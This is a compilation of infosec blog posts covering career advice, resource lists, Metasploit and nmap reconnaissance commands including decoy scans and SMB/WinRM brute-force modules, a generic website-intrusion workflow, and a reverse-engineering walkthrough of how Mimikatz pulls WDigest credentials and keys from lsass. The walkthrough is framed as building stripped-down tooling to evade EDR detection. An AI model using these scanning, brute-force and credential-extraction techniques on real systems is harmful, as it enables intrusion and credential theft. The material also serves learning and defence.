  • Corelan – This is by far the best resource out there for learning about exploit development. (link)
  • FuzzySecurity – Another good learning resource with some tutorials available (link)
  • Exploit-DB – One of the best things you can do is find examples of exploits (often with apps attached) and try and replicate the exploit independently (link)
  • Hacking – The Art of Exploitation – A fantastic book that covers ton’s of different exploitation techniques (link)
  • The Shellcoders Handbook – Another fantastic book on exploit development and shellcoding (link)

Other than that, Google, Google, and some more Google. I’ve left off some area’s such as forensics and compliance because personally I’m not interested in them so I haven’t gone looking for resources, I’m sure there are some fantastic ones out there.

Formal Learning
Outside of the free resources you can also begin to get certificates to make yourself more appealing to employers if you wish to transition into the field as more of a career path. Some certification’s I’d highly recommend would be the “Penetration Testing with Kali Linux” course from Offensive Security (link) if you’re interested in network security. It’s easily one of the best learning experiences I’ve ever had in the field and taught me more in 60 days than I’d learnt in a year on my own. Their “Cracking the Perimeter” is also a great course, focusing a little more on exploit development (link).

If you’re looking at developing your programming skills things like SecurityTube’s “Python for Pentesters and Hackers” (link) is a great foundation that will teach you how to do plenty of nifty things like building your own port scanners, password crackers etc. I don’t place a huge value into their certification’s that they offer from an employment perspective, but I’d look at it more as a consolidated lump of knowledge and examples for sale which can still be valuable.

The “Certified Ethical Hacker” course is another commonly mentioned. Honestly it’s typically looked down upon so I don’t think it’s necessarily worth the money – but if you need a formal course to learn things then it might be worth the money to you. A lot of these certifications and their value are discussed over at TheEthicalHacker.net’s forums located here.

“Just seeing if you can”
Hacking is all about gaining access to things that we’re not meant to. Creating an exploit, finding a SQL injection, Password Cracking it’s all designed to put us towards the goal of taking control of the box we’re attacking. I guarantee almost every new hacker has started dreaming about “Just seeing if they can” get access to that school website. “Just seeing if they can” gain access to the neighbors WiFi network. Sending their friend a trojan virus “just to see if they can” take control. Worse still you might end up visiting places like HackForums.net and seeing a lot of people trying to infect others with RATs, build botnet’s etc under the impression this is hacking, or sadly that this is the only way you can learn.

I need to emphasize that this is not the case. Any type of “just seeing if you can” type exercises can be replicated through the use of virtual machines, your own routers or even capture the flag / wargame competitions out there. Being realistic even if you can access another person’s machine, what are you going to do with it? Are you really going to try and steal credit card details and make fraudulent transactions? Are you really going to steal passwords and be paranoid that your activity is going to be traced back to you for the sake of peeking at someone’s emails? There have been plenty of examples of newbies being charged, not realizing the seriousness of the crimes they are committing. If you went for a job with the FBI and they had a look through your post history would you like them to read that post about you asking how to host a botnet? It’s a classic example of what’s on the internet is forever, and if you really want a career in information security you need that clean record to obtain any security clearances you’re going to need to do your job. Getting caught for stupid stuff just isn’t worth it.

Summary
So after a long ramble, what’s the key points?

  • A hacker will actively seek out information, not wait for others to give it to him
  • The difference between a script kiddie and a new hacker is the desire to learn
  • You need to experiment with a wide range of information security fields to find what interests you
  • Don’t let anyone tell you that there are prerequisites for learning information security, there isn’t.
  • It’s not worth “just seeing if you can” do anything that isn’t legal, the risk vs reward makes no sense for doing so
  • With courses, wargames, capture the flags and more importantly virtual machines there is no hacking scenario that can’t be replicated legally

Have fun, sorry if it got preachy towards the end and enjoy pwning boxes! Information security is an awesome field and you’ll be learning something new every day that you’re involved in it. There is no right answer for getting into the field apart from jumping into it with both feet. Get wet, learn to tread water and stay afloat, one day you might even be able to swim a little!

Find me on twitter @jimmwayans

cybersecurity

Information/Cyber Security Cheat Sheet

infosec

This is a recollection of links and resources I have found / been told about over the years. I developed this post in the hope to map out good resources in the industry, facilitating the spread of knowledge, no matter the skill level.

If any errors are spotted, or any links need adding / updating / removing. Please contact me via Twitter @jimmwayans (https://twitter.com/jimmwayans).

CTF Site Links

The King Of CTF Pages – https://ctftime.org/
247CTF – https://247ctf.com
HackTheBox – https://hackthebox.eu/
RootMe – https://root-me.org/
0x0539 – https://0x0539.net/
Laptop Hacking Coffee – https://ctf.laptophackingcoffee.org/
pwnable tw – http://pwnable.tw/ (Only BinExp)
pwnable kr – http://pwnable.kr/ (Only BinExp)
PicoCTF – https://picoctf.com/ (Beginner friendly)
reversing kr – http://reversing.kr/
The Stereotyped Challenges – https://chall.stypr.com/
SDSLabs CTF – https://backdoor.sdslabs.co/

Payload Cheat Sheets

PayloadsAllTheThings – https://github.com/swisskyrepo/PayloadsAllTheThings
BurpSuite XSS Cheat Sheet – https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

OSCP Preparation

Sam’s Review / Guide – https://coffeejunkie.me/OSCP-Exam-Overview/
R4J Buffer Overflow – https://github.com/r4j0x00/oscp-like-stack-buffer-overflow
Computerphile BoF Explanation – https://www.youtube.com/watch?v=1S0aBV-Waeo
g0tm1lk Linux Priv Esc Cheat Sheet – https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Windows Priv Esc – https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Windows Priv Esc (built around OSCP) – https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html

SAST Practice Pages

Secure Code Warrior – https://securecodewarrior.com/
ExploitDB (May require imagination) – https://www.exploit-db.com/

All Around Practical Learning (non-competitive)

OWASP Juice Shop – https://owasp.org/www-project-juice-shop/
Pentester Labs – https://pentesterlab.com/
OverTheWire – https://overthewire.org/ (Beginner friendly)
Pentester Academy – https://www.pentesteracademy.com/
PortSwigger Labs – https://portswigger.net/web-security
OverTheWire – http://www.overthewire.org/
CTFLearn – http://ctflearn.com/
VulnHub – http://vulnhub.com/
Hacker101 – https://www.hacker101.com/
OSINTme – https://osintme.com/

All Around Theory Learning (non-competitive)

OWASP – https://owasp.org/
BurpSuite Research – https://portswigger.net/research
HumbleBundle Cyber Security Books – https://www.humblebundle.com/books/cybersecurity-2020-wiley-books?hmb_source=navbar&hmb_medium=product_tile&hmb_campaign=tile_index_4
Free SANS courses for the fundamentals – https://www.cyberaces.org/courses.html

Relevant Blogs / Podcasts

Security Weekly – https://securityweekly.com/category-shows/application-security-weekly/
Darknet Diaries – https://darknetdiaries.com/
TheManyHatsClub – https://themanyhats.club/
0x00Sec (Community Blog) – https://0x00sec.org/
Secret Club – https://secret.club/
g0tm1lk – https://blog.g0tmi1k.com/
Cybering – https://cybering.cc/

Twitch Hacking Channels (English)

TheBlindHacker – https://www.twitch.tv/theblindhacker
GeoHotz – https://www.twitch.tv/georgehotz
LiveOverflow – https://www.twitch.tv/LiveOverflow

Twitch Hacking Channels (Spanish)

S4vitar – https://www.twitch.tv/s4vitaar

Youtube Channels Pentesting (English)

HackerSploit – https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q
IppSec – https://youtube.com/ippsec
TheCyberMentor – https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw
LiveOverflow – https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w
Computerphile – https://www.youtube.com/user/Computerphile

Relevant Discord Servers and Communities

TheManyHatsClub – https://discord.gg/infosec
ThugCrowd – https://thugcrowd.com/
LaptopHackingCoffee – https://laptophackingcoffee.org/doku.php?id=start
HackTheBox – https://discord.gg/hRXnCFA
0x00Sec – https://discord.gg/PHM9Wak (https://0x00sec.org)
John Hammond Discord – https://discord.gg/Kgtnfw4
ReSwitched – https://discordapp.com/invite/ZdqEhed
ur-hackr – https://ur-hackr.com/

Companies Offering Certificates

ELearnSecurity – https://elearnsecurity.com/
Pentester Academy – https://www.pentesteracademy.com/
Offensive Security – https://www.offensive-security.com/
HackTheBox – https://hackthebox.eu/

The Cybrary – https://www.cybrary.it/
CyberFirst – https://www.ncsc.gov.uk/cyberfirst/
Mind Map Everything – https://www.amanhardikar.com/mindmaps.html
Events around London – https://medium.com/@securestep9/cybersecurity-infosec-appsec-meetups-events-in-london-3688c4a42ea6
Razvi’s List of Hacking Sites – https://razvioverflow.github.io/starthacking
Peerlyst – https://www.peerlyst.com/
CTFs for beginners – https://twitter.com/JenF3rr_/status/1208577793359003648
HackerOne Bugbounty page – https://hackerone.com/
Using Twitter for InfoSec – https://dev.to/vickilanger/that-s-it-that-s-the-tweet-send-3e0h
CVE feed from the mitre – https://cve.mitre.org/

nmap scanning

Active Information Gathering with Metasploit-Framework

Using Nmap to perform port scanning

Using -sT scanning mode is the default scanning mode of Nmap. The status of the target port is accurately judged through the TCP three-way handshake packet. Since three connections are established, it is extremely easy to be captured by the target firewall.

msf> nmap -sT 127.0.0.1 

The -sS scan mode does not perform three-way handshake, it is called semi-open scan, also known as stealth scan. Compared to TCP scanning, it is faster and more secure.

msf> nmap -sS 127.0.0.1

The –sU scan mode is the fastest scan method, because UDP only sends and receives, but there may be some errors between the scan results and the above two scan methods.

msf> nmap -sU 127.0.0.1

Operating system identification.
Nmap can identify the target operating system in two ways:

1. The commonly used -O parameter, the -O parameter is an advanced parameter provided by Nmap, which is usually used alone.

msf> nmap -O 127.0.0.1

2. The -sV parameter can be used together with the above port scan parameters, and nmap will add the identification result of the system version at the end of the scan result.

msf> nmap -sSV 127.0.0.1

Nmap security scan

Usually, the scan initiated on the target site or host will be recorded by the WAF or IDS, which is extremely insecure for the tester, so the intrusive and deceptive scans are hidden from the tester. IP information is necessary, Nmap provides the -D advanced parameter, if you provide 2 IP addresses, then Nmap will leave 3 IP addresses in the WAF log to confuse the audience and ensure the test as much as possible the safety of the user.

msf> nmap -sS 127.0.0.1 -D 10.10.20.100,10.10.20.101 

1. TCP port scan

msf> use auxiliary/scanner/portscan/tcp 

2. SYN port scan

msf> use auxiliary/scanner/portscan/syn

3. Call nmap

In metasploit-framework use db_nmap to do a complete banner grabbing, use the following command:

msf> db_nmap -Pn -sTV -T4 --open --min-parallelism 64 --version-all 127.0.0.1 -p - 22

The -Pn parameter tells Nmap that the target site has been determined to be online, no further detection is required, and the detection process of whether it is online or not is skipped. -sTV means to scan in TCP mode, and to determine the banner information and version of each port at the same time. The port, the –min-parallelism parameter executes a minimum number of 64 parallelisms, the –version-all parameter indicates that all probes of nmap are used to identify the service details, and the -p parameter is set to – indicates that all ports of the target are scanned.

4. Use ARP for live host scanning

msf> use auxiliary/scanner/discovery/arp_sweep  set RHOST   set THREADS 10  run

5. Use UDP to detect live hosts

msf> use auxiliary/scanner/discovery/udp_sweep  set RHOST   set THREADS 10  run

6. Use SMB to detect live hosts

msf> use auxiliary/scanner/smb/smb_enumshares   set RHOSTS   set THREADS 10  run

7. SMB version scan

msf> use auxiliary/scanner/smb/smb_version 

8. SMB brute force (dictionary required)

msf> use auxiliary/scanner/smb/smb_login

9. SSH version scan

msf> use auxiliary/scanner/ssh/ssh_version

10. FTP version scan

msf> use auxiliary/scanner/ftp/ftp_version

11. SMTP enumeration

msf> use auxiliary/scanner/smtp/smtp_enum

12. SNMP login

msf> use auxiliary/scanner/snmp/snmp_enum

13. SNMP login

msf> use auxiliary/scanner/snmp/snmp_login

14. WinRM scan

msf> use auxiliary/scanner/winrm/winrm_auth_methods

15. WinRM brute force cracking

msf> use auxiliary/scanner/winrm/winrm_cmd

Offensive and Defense Exercise Preparation | How to build an effective corporate security defense system

After the epidemic, work and life gradually returned to normal. For the network security industry, offensive and defensive drills are once again on the agenda. In the new year, how do companies prepare for defense? Let us find the answer from the review and reflection in 2019/20.

In 2019/20, offensive and defensive exercises once became a buzzword in the security circle, and such activities of all sizes continued. After the experience, many companies will re-examine their own security defense capabilities, and even the protection capabilities of their partners. The essence of offensive and defensive exercises is to verify the effectiveness of corporate security defense capabilities from the attacker’s perspective. Therefore, this article will introduce from the attacker’s perspective to provide some practical suggestions for companies facing offensive and defensive exercise needs or wishing to build an effective defense system.

Recurring attack chain

When it comes to attacks, we have to mention the “Cyber ​​Kill Chain”. According to the attacking methods that have appeared in actual offensive and defensive exercises in recent years, we have drawn the “attack chain” as shown in the following figure:

Cyber Kill Chain

Attack chain in offensive and defensive exercises

Everything is difficult at the beginning. The first problem that the attacker encounters after selecting the attack target is often find a breakthrough. Most of them will combine domain name, IP and other asset scanning to step on and infiltrate the target business system. At this time, the Web is still the main one. Breakthrough. In the past, web vulnerabilities have emerged endlessly. Attackers can use web servers to implant variants of Webshell and then invade further, gain server permissions, and continue to collect intranet information to expand their results. Many companies have problems with lack of defense or bypass of defense in Web security. Many web assets have not been effectively discovered, or WAF defenses have been bypassed, so how to formulate effective WAF rules in the first time has become the primary problem that enterprises urgently need to solve, which is to block the entrance of attackers.

By discovering and exploiting vulnerabilities in border servers, attackers often gain the first entry point of intrusion, such as Webshell, and even directly gain control of the server. Server control is the main battlefield of offensive and defensive confrontation. The business, data, and core assets of the enterprise are all on the server. The attacker’s goal is often to obtain the data of core assets or control the business of core assets to further penetrate. On the infiltrated server, the attacker uses a variant of Webshell such as “ice scorpion”, etc., and even Rootkit further controls the server. After invading the internal network, they often continue to collect data and information on the internal network and install multiple backdoors to achieve further control. These backdoors often use DNS tunnel communication, C&C communication, etc. to connect to the control end. Some high-level attackers Logs are often erased or even fake logs are created to confuse the defender.

The attack process is a dynamic process of continuous correction. A good attacker often combines the information he has obtained to continuously infiltrate and analyze the target.

The defender will become passive or even anxious in this offensive and defensive exercise. How to effectively detect the attacker and block them in time has become an urgent problem to be solved. Common protection methods include blocking the attacker’s IP, setting protection strategies, combining existing security product strategies with continuous analysis, and operating and revising existing protection strategies.

Constructing the defensive quadrant

Combining the attacker’s attack chain and demand urgency, I constructed a set of defense quadrants based on offensive and defensive confrontation. The quadrant not only includes products, but also includes operations and services, hoping to help the defender deploy a security system quickly and effectively. Good protection.

infosec

Defensive quadrant

1. The defense quadrant

The defense quadrant is the most important quadrant. It contains the bottom-line products of enterprise protection. The products are mainly capable of preventing and blocking hacker attacks. In the real-world offensive and defensive confrontation, they can resist most attackers. Here is an introduction. WAF, FW, HIPS. WAF can withstand most of the intrusions from the Web, especially the programmable WAF. When faced with new vulnerabilities in offensive and defensive exercises, it can be blocked by writing scripts for the first time. The new generation of WAF also has semantic analysis technology. , Which can effectively reduce false alarms and improve the defense capability of the defender against unknown threats. The firewall can effectively control the assets at the border and detect and block malicious communication behaviors in the network. As for the key targets of hacker attacks such as assets on the server, HIPS installed in the server operating system can detect attacks such as Webshell, Rootkit, and hacking actions (rebound shell, brute force cracking, privilege escalation, etc.) in the first time. Features and executes interception and protection to improve the level of defense against core assets.

2. Detection quadrant

The detection quadrant focuses on the detection and trapping of hackers. Products in this quadrant can quickly detect intrusion, detect hacker attacks and trap and profile them, such as HIDS, NTA, and Honeypot. Here we focus on NTA and Honeypot. NTA products are called Network Traffic Analysis, but I prefer to understand it as Network Threat Analysis, that is, through traffic modeling and analysis of network threats, real-time perception and early warning, this type of products compared to traditional IPS in traffic Coverage and threat modeling are more complete and comprehensive. Honeypot (Honeypot) is a very good tool for detecting hacker intrusions. In a real network environment, the defender will not trigger the honeypot, and the attacker IP found through the honeypot can be directly linked to the firewall for blocking, and Its unique JSONP probe can perform attack profile on hackers, so as to grasp the hacker intrusion activities in the first time. The profile function plays a vital role in tracing the source of the attack.

3. Safe Operation Quadrant

The security operations quadrant is a combined quadrant, which is a combination of the previous two. Here, we recommend the product to cooperate with the security analyst model. In the past few years, penetration testing engineers have become very popular, which is caused by many projects that are result-oriented and push back corporate security construction. With the emergence of security vulnerabilities and the increase in the number of hacking incidents, security analysts will become more important in the future. They can analyze the effectiveness of various security product configuration strategies and deployment locations that have been deployed by the defender, and adjust them to the best level. Security incidents are investigated and traced to assist enterprises in solving the last mile problem of safety. Product tools can choose SOAR for security orchestration and automated response. They can combine the strategy orchestration of security analysts with the APIs of various systems to adjust protection and response strategies to achieve unified analysis, centralized display, and rapid processing to achieve a secure closed loop.

4. Threat Intelligence Quadrant

Intelligence work in the Threat Intelligence Quadrant is divided into two categories. The first type is the collection and analysis of real-time intelligence. In the process of offensive and defensive exercises, especially in large-scale offensive and defensive exercises, intelligence becomes extremely important. The defender should continue to collect attack intelligence, such as the attack method of the attacking team, the attacker’s source IP, common tools, and other information, and add this intelligence to the product operation and maintenance of the defense quadrant in a timely manner. The second category belongs to passive intelligence collection. Take scanner products as an example. The new generation of scanners often have the ability to quickly analyze assets and detect vulnerabilities. Considering the attacker’s methods, the vulnerability detection here should be based on Web vulnerabilities. , And also covers system vulnerability scanning support. This type of scanner can help security analysts quickly detect assets during the protection period in real time, and actively or passively scan for vulnerabilities in order to resolve security issues as soon as possible.

summary

The security products in the above four quadrants combined with security analysis services can quickly improve the defense capabilities of the defender to a higher level in actual offensive and defensive exercises. The essence of offensive and defensive confrontation is to fully expose problems and verify the effectiveness of existing protection methods, while continuously correcting hidden problems that have been discovered. This will be a continuous process. The defender also needs to continue to master its own asset dynamics, vulnerability updates, and vulnerabilities. Threat intelligence and other information are comprehensively used to achieve sufficient defensive effects.

It is hoped that each defender can quickly and reasonably complement the shortcomings in the offensive and defensive exercises according to their actual conditions, combined with effective security analysis and operational strategies, to detect and block more attackers as soon as possible from their own defense gates.

web security

How Do Hackers Break Into Websites?

As a company’s operation and maintenance personnel, especially for large and medium-sized enterprises, it is not uncommon for websites and web applications to be attacked by hackers.

Web apps and website can be divided into three sections: individual operations, team/company operations, and government operations.

The proportion of personal websites is still very large, and most of these websites use open source CMSs.

Such as blogs: WordPress, Joomla, Typecho, Z-blog, More…,

Community categories: Discuz, PHPwind, StartBBS, Mybb, etc.

The proportion of commonly used open source CMSs used by team/company websites is also very large, and government websites are basically outsourced to develop more.

If it is broader, it can be divided into two major parts: open source and closed source.

What can effectively illustrate the pseudo-security of a website is to prove from the perspective of actual combat whether it is really solid.

The reason why I talk about intrusion methods here is not to teach you how to invade the website, but to understand the various methods of intrusion. Only by knowing yourself how the attacks happen, then can you learn how to protect.

A kitchen knife can be used to cut vegetables, and it can also be used to kill people.

Let’s talk about some common procedures for hackers to invade websites.

The common process for hackers to attack and hack websites

1. Information Gathering

1.1 Whois information – registrant, phone, email, DNS, address

1.2 Google hack – sensitive directories, sensitive files, more information collection

1.3 Server IP – Nmap scan, port corresponding service, C segment

1.4 Side note – Bing query

1.5 If you encounter CDN – Cloudflare (bypass), start with subdomains (mail, postfix), DNS transfer domain vulnerabilities

1.6 Server, components (fingerprint) – operating system, web server (apache, nginx, iis), scripting language

Through the information gathering process, the attacker has basically been able to obtain most of the information about the website. Of course, information gathering is the first step of the website invasion and determines the success of the subsequent attack.

2. Vulnerability Scanning 

2.1 ​​Scan the website/web application for vulnerabilities – (tools: acunetix, burpsuite, dirsearch, nikto etc)

2.2 XSS, CSRF, XSIO, SQL injection, permission bypass, arbitrary file reading, file inclusion…

2.3 Test for upload vulnerabilities – truncation, modification, analysis vulnerabilities

2.4 Is there a verification code (2fa)? – brute force attempt

By now, the attacker has a lot of information about your website and may have found vulnerabilities affecting your website. In the next step, they will begin to use those vulnerabilities to gain access to your website.

3. Vulnerability Exploitation

3.1 Thinking about the purpose – what kind of effect is achieved. (Exploit any found vulnerabilities)

3.2 Hidden, destructive – Find the corresponding EXP attack payload based on the detected application fingerprint or write it yourself

3.3 Start the vulnerability exploit, obtain the corresponding permissions, and get a webshell on the server, according to different scenarios

4. Privilege Escalation

4.1 Choose different attack payloads for privilege escalation according to the server type (Use Metasploit where possible)

4.2 Permission escalation is not possible, start password guessing based on the information obtained, and retrospective information collection

5. Implant a Backdoor

5.1 Concealment

5.2 Check and update regularly to maintain persistence

6. Log cleanup (Clear your tracks)

6.1 Camouflage, concealment, to avoid alarming, they usually choose to delete the specified log

6.2 According to the time period, find too many corresponding log files. . .

Having said so much, how much do you understand these steps? Read more and research online.

Of course, the type of attack may largely depend on the motivation the hacker has.

Although the time is relatively long, the general idea is like this.

After talking about the intrusion process, let’s talk about why enterprise websites need to be secured..

First: Cybersecurity law regulations

The proposed cybersecurity law clearly requires for the provisions of critical information infrastructure operators (such as critical information infrastructure operators should themselves or Entrust a network security service organization to conduct inspection and assessment of its network security and possible risks at least once a year, and report the inspection and assessment results and improvement measures to the relevant department responsible for the security protection of critical information infrastructure), which is quite mandatory ——In the legal liability section, it is clearly mentioned that if these regulations are not fulfilled, the relevant competent department shall order rectification and give warnings;

Regarding the interpretation of the Cyber ​​Security Law, you can click here to view

It is worth noting that penetration testing is a commonly used and very important method in information security risk assessment and web security.

Second: Penetration testing helps PCI DSS compliance construction

In PCI DSS (Payment Card Industry Security Standards Council) Section 11.3, there is such a requirement: at least every year or after any major upgrades or modifications to the infrastructure or applications (such as operating system upgrades, environment additions) Adding a network server to a sub-network or environment) needs to perform internal and external penetration testing.

Third: Baseline requirements for ISO27001 certification

ISO27001 appendix “A12 Information System Development, Acquisition and Maintenance” requirements establishes a software security development cycle, and specifically proposes that additional penetration tests should be conducted with reference to, for example, OWASP standards before going live.

Fourth: Requirements in the CBK’s multiple regulatory guidelines

According to the clear requirements in the multiple regulatory guidelines issued by the Central Bank of Kenya, the bank’s security strategy, internal control system, risk management, system security and other aspects need to be penetrated testing and control capabilities inspection and evaluation.

Fifth: Minimize business losses

In addition to meeting the compliance requirements of the policy, improving the operational safety of customers or meeting the requirements of business partners. The ultimate goal should be to minimize business risks.

Companies need to conduct as many penetration tests as possible to keep security risks under control.

In the process of website development, many hidden security problems that are difficult to control and discover will occur. When these large numbers of flaws are exposed to the external network environment, information security threats are generated.

This problem can be effectively prevented by companies through regular penetration testing, so that they can be detected and resolved early. The system will become more stable and secure after being tested and strengthened by cybersecurity professionals. The test report can help managers make better project decisions, at the same time prove the necessity of increasing the security budget, and convey security issues to the senior management. .

The difference between penetration testing and security testing

Penetration testing is different from traditional security scanning. In the overall risk assessment framework, the relationship between vulnerability and security scanning can be described as “continuing”, that is, as mentioned above, it is a verification and supplement to the scanning results.

In addition, the biggest difference between penetration testing and traditional security scanning is that penetration testing requires a lot of manual intervention.

These tasks are mainly initiated by cybersecurity professionals. On the one hand, they use their professional knowledge to conduct in-depth analysis and judgment on the scan results.

On the other hand, it is based on their experience to manually check and test the hidden security issues that the scanner cannot find, so as to make more accurate verification (or simulated intrusion) behavior.

Incase you need security service such as penetration testing, drop me a line on twitter @jimmwayans and I’ll be glad to work with you.

mimikatz

Mimikatz Exploration – WDigest

Mimikatz, to this day, remains the tool of choice when it comes to extracting credentials from lsass on Windows operating systems. Of course this is due to the fact that with each new security control introduced by Microsoft, GentilKiwi always has a way out. If you have ever looked at the effort that goes into Mimikatz, this is no easy task, with all versions of Windows x86 and x64 supported. And of course with the success of Mimikatz over the years, BlueTeam are now very adept at detecting its use in its many forms. Essentially, execute Mimikatz on a host, and if the environment has any maturity at all you’re likely to be flagged. Almost all modern EDRs will detect Mimikatz very fast.

Its always very important to understand your tools beyond just executing a script and running automated commands. With security vendors reducing and monitoring the attack surface of common tricks often faster than we can discover fresh methods, knowing how a particular technique works down to the API calls can offer a lot of benefits when avoiding detection in well protected environments.

That being said, Mimikatz is a tool that is carried along with most post-exploitation toolkits in one form or another. And while some security vendors are monitoring for process interaction with lsass, many more have settled on attempting to identify Mimikatz itself.

I’ve been toying with the idea of stripping down Mimikatz for certain engagements (mainly those where exfiltrating a memory dump isn’t feasible or permitted), but it has been bugging me for a while that I’ve spent so long working with a tool that I’ve rarely reviewed low-level.

So I wanted to change this and explore some of its magic, starting with where it all began, WDigest. Specifically, looking at how cleartext credentials are actually cached in lsass, and how they are extracted out of memory with "sekurlsa::wdigest". This will mean disassembly and debugging, but hopefully by the end you will see that while its difficult to duplicate the amount of effort that has gone into Mimikatz, if your aim is to only use a small portion of the available functionality, it may be worth crafting a custom tool based on the Mimikatz source code, rather than opting to take along the full suite.

To finish off the post I will also explore some additional methods of loading arbitrary DLL’s within lsass, which can hopefully be combined with the code examples demonstrated.

Note: This post uses Mimikatz source code heavily as well as the countless hours dedicated to it by its developer(s). This effort should become more apparent as you see undocumented structures which are suddenly revealed when browsing through code. Thanks to Mimikatz, Benjamin Delpy and Vincent Le Toux for their awesome work.

How does Mimikatz’s “sekurlsa::wdigest” actually work?

As mentioned, in this post we will look at is WDigest, arguably the feature that Mimikatz became most famous for. WDigest credential caching was of course enabled by default up until Windows Server 2008 R2, after which caching of plain-text credentials was disabled.

When reversing an OS component, I usually like to attach a debugger and review how it interacts with the OS during runtime. Unfortunately in this case this isn’t going to be just as simple as attaching WinDBG to lsass, as pretty quickly you’ll see Windows grind to a halt before warning you of a pending reboot. Instead we’ll have to attach to the kernel and switch over to the lsass process from Ring-0.

With a kernel debugger attached, we need to grab the EPROCESS address of the lsass process, which is found with the !process 0 0 lsass.exe command:

infosec kenya

 

With the EPROCESS address identified (ffff9d01325a7080 above), we can request that our debug session is switched to the lsass process context:

 

A simple lm will show that we now have access to the WDigest DLL memory space:

infosec

 

 

If at this point you find that symbols are not processed correctly, a .reload /user will normally help.

With the debugger attached, let’s dig into WDigest.

Diving into wdigest.dll and a little of lsasrv.dll

If we look at Mimikatz source code, we can see that the process of identifying credentials in memory is to scan for signatures. Let’s take the opportunity to use a tool which appears to be in vogue at the minute, Ghidra, and see what Mimikatz is hunting for.

As I’m currently working on Windows 10 x64, I’ll focus on the PTRN_WIN6_PasswdSet signature seen below:

how to be a hacker

 

After providing this search signature to Ghidra, we reveal what Mimikatz is scanning memory for:

Cyber africa

how to be a hacker

 

 

Above we have the function LogSessHandlerPasswdSet. Specifically the signature references just beyond the l_LogSessList pointer. This pointer is key to extracting credentials from WDigest, but before we get ahead of ourselves, let’s back up and figure out what exactly is calling this function by checking for cross references, which lands us here:

how to be a hacker

 

Here we have SpAcceptCredentials which is an exported function from WDigest.dll, but what does this do?

 

This looks promising as we can see that credentials are passed via this callback function. Let’s confirm that we are in the right place. In WinDBG we can add a breakpoint with bp wdigest!SpAcceptCredentials after which we use the runas command on Windows to spawn a shell:

 

This should be enough to trigger the breakpoint. Inspecting the arguments to the call, we can now see credentials being passed in:

 

If we continue with our execution and add another breakpoint on wdigest!LogSessHandlerPasswdSet, we find that although our username is passed, a parameter representing our password cannot be seen. However, if we look just before the call to LogSessHandlerPasswdSet, what we find is this:

 

This is actually a stub used for Control Flow Guard (Ghidra 9.0.3 looks like it has an improvement for displaying CFG stubs), but following along in a debugger shows us that the call is actually to LsaProtectMemory:

 

This is expected as we know that credentials are stored encrypted within memory. Unfortunately LsaProtectMemory isn’t exposed outside of lsass, so we need to know how we can recreate its functionality to decrypt extracted credentials. Following with our disassembler shows that this call is actually just a wrapper around LsaEncryptMemory:

how to be a hacker

 

And LsaEncryptMemory is actually just wrapping calls to BCryptEncrypt:

how to be a hacker

 

Interestingly, the encryption/decryption function is chosen based on the length of the provided blob of data to be encrypted. If the length of the buffer provided is divisible by 8 (donated by the “param_2 & 7” bitwise operation in the screenshot above), then AES is used. Failing this, 3Des is used.

So we now know that our password is encrypted by BCryptEncrypt, but what about the key? Well if we look above, we actually see references to lsasrv!h3DesKey and lsasrv!hAesKey. Tracing references to these addresses shows that lsasrv!LsaInitializeProtectedMemory is used to assign each an initial value. Specifically each key is generated based on calls to BCryptGenRandom:

 

This means that a new key is generated randomly each time lsass starts, which will have to be extracted before we can decrypt any cached WDigest credentials.

Back to the Mimikatz source code to confirm that we are not going too far off track, we see that there is indeed a hunt for the LsaInitializeProtectedMemory function, again with a comprehensive list of signatures for differing Windows versions and architectures:

how to be a hacker

 

And if we search for this within Ghidra, we see that it lands us here:

 

Here we see a reference to the hAesKey address. So, similar to the above signature search, Mimikatz is hunting for cryptokeys in memory.

Next we need to understand just how Mimikatz goes about pulling the keys out of memory. For this we need to refer to kuhl_m_sekurlsa_nt6_acquireKey within Mimikatz, which highlights the lengths that this tool goes to in supporting different OS versions. We see that hAesKey and h3DesKey (which are of the type BCRYPT_KEY_HANDLE returned from BCryptGenerateSymmetricKey) actually point to a struct in memory consisting of fields including the generated symmetric AES and 3DES keys. This struct can be found documented within Mimikatz:

typedef struct _KIWI_BCRYPT_HANDLE_KEY {
    ULONG size;
    ULONG tag;    // 'UUUR'
    PVOID hAlgorithm;
    PKIWI_BCRYPT_KEY key;
    PVOID unk0;
} KIWI_BCRYPT_HANDLE_KEY, *PKIWI_BCRYPT_HANDLE_KEY; 

We can correlate this with WinDBG to make sure we are on the right path by checking for the “UUUR” tag referenced above:

 

At offset 0x10 we see that Mimikatz is referencing PKIWI_BCRYPT_KEY which has the following structure:

typedef struct _KIWI_BCRYPT_KEY81 {
    ULONG size;
    ULONG tag;    // 'MSSK'
    ULONG type;
    ULONG unk0;
    ULONG unk1;
    ULONG unk2; 
    ULONG unk3;
    ULONG unk4;
    PVOID unk5;    // before, align in x64
    ULONG unk6;
    ULONG unk7;
    ULONG unk8;
    ULONG unk9;
    KIWI_HARD_KEY hardkey;
} KIWI_BCRYPT_KEY81, *PKIWI_BCRYPT_KEY81;

And sure enough, following along with WinDBG reveals the same referenced tag:

 

The final member of this struct is a reference to the Mimikatz named KIWI_HARD_KEY, which contains the following:

typedef struct _KIWI_HARD_KEY {
    ULONG cbSecret;
    BYTE data[ANYSIZE_ARRAY]; // etc...
} KIWI_HARD_KEY, *PKIWI_HARD_KEY;

This struct consists of the the size of the key as cbSecret, followed by the actual key within the data field. This means we can use WinDBG to extract this key with:

 

This gives us our h3DesKey which is 0x18 bytes long consisting of
b9 a8 b6 10 ee 85 f3 4f d3 cb 50 a6 a4 88 dc 6e ee b3 88 68 32 9a ec 5a.

Knowing this, we can follow the same process to extract hAesKey:

 

Now that we understand just how keys are extracted, we need to hunt for the actual credentials cached by WDigest. Let’s go back to the l_LogSessList pointer we discussed earlier. This field corresponds to a linked list, which we can walk through using the WinDBG command !list -x "dq @$extret" poi(wdigest!l_LogSessList):

 

The structure of these entries contain the following fields:

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    ULONG    UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;

